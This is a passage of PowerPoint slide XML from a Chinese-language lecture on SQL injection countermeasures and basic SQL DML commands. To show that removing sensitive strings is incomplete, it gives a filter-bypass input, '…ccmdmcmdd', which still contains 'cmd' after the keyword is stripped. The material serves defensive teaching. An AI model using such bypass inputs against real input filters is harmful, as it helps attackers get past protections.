              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>被公认是最根本的解决方案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在确认客户端的输入合法之前，服务端拒绝进行关键性的处理操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，不过这需要开发者能够以一种安全的方式来构建网络应用程序，虽然已有大量针对在网络应用程序开发中如何安全地访问数据库的文档出版，但仍然有很多开发者缺乏足够的安全意识，造成开发出的产品中依旧存在注入漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5740E5AC-E533-4D26-A480-1002423DC218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4886934" y="4081684"/>
            <a:ext cx="3300905" cy="474140"/>
            <a:chOff x="4778928" y="837929"/>
            <a:chExt cx="3300905" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7"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3A1D3DA1-51C1-4984-A4E2-0E78C88C2324}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4778928" y="837929"/>
              <a:ext cx="3300905" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyP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封装客户端提交信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="4689370"/>
            <a:ext cx="11161240" cy="581057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的做法需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RDBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的支持，目前只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>采用该技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2796477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251540" y="837929"/>
            <a:ext cx="4355680" cy="474140"/>
            <a:chOff x="4251540" y="837929"/>
            <a:chExt cx="4355680"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4251540" y="837929"/>
              <a:ext cx="4355680" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyP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替换或删除敏感字符</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字符串</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="1528093"/>
            <a:ext cx="11161240" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>则是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一种不完全的解决措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，例如，当客户端的输入为 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ccmdmcmdd</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时，在对敏感字符串“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cmd</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替换删除以后，剩下的字符正好是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cmd</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5740E5AC-E533-4D26-A480-1002423DC218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166502" y="2845841"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7"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3A1D3DA1-51C1-4984-A4E2-0E78C88C2324}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5240594" y="837929"/>
              <a:ext cx="2377574" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyP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屏蔽出错信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="3453527"/>
            <a:ext cx="11161240" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是目前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最常被采用的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，很多安全文档都认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入攻击需要通过错误信息收集信息，有些甚至声称某些特殊的任务若缺乏详细的错误信息则不能完成，这使很多安全专家形成一种观念，即注入攻击在缺乏详细错误的情况下不能实施。而实际上，屏蔽错误信息是在服务端处理完毕之后进行补救，攻击其实已经发生，只是企图阻止攻击者知道攻击的结果而已。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4341143" y="6449394"/>
            <a:ext cx="4801314" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="24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通常，上面这些方法需要结合使用</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35237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linds(horizontal)">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5066663" y="837929"/>
            <a:ext cx="2725426" cy="474140"/>
            <a:chOff x="5066663" y="837929"/>
            <a:chExt cx="2725426"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066663" y="837929"/>
              <a:ext cx="2725426" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="non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DML</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的主要指令有</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D19FBC-6B00-4C4D-BD50-0B08A5BB4875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1172791" y="1772220"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF76DA1-3EEB-4734-A201-78818B4683B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1092F1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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40A0CF7D-7D32-4F8D-8140-7BD599ABF186}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3326486" y="2063504"/>
              <a:ext cx="1156855" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SELECT</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61FE861-003C-4D74-9B0D-997BAFF9D857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3533749" y="1814459"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="矩形 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9638CC-9072-4475-AA69-7FD4EB14EF8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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1DEB042D-1B2D-41D9-A0BA-66410E9BB6C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4957141" y="2063504"/>
              <a:ext cx="3075935" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>从数据库表中获取数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0C0D95-22B9-4E37-BC53-359139F4DBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6760009" y="1770698"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84ED552B-3149-4BDE-B7FE-2DEC3E95ADA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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2" name="矩形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B6082D-53A0-4CD2-A9E3-F4921EAF6573}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3267290" y="2063504"/>
              <a:ext cx="1205994" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>UPDATE</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62307ACE-CA17-4928-9BC3-7A25659E64C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9120966" y="1812937"/>
            <a:ext cx="2492990" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075934" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C25F8BF-66BC-4D6E-B3C3-EEDA5C704B37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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B2DA10F5-D272-4244-8F8E-C67908AA7479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4957141" y="2063504"/>
              <a:ext cx="3075934" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>更新数据库表中的数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35">
            <a:extLst>
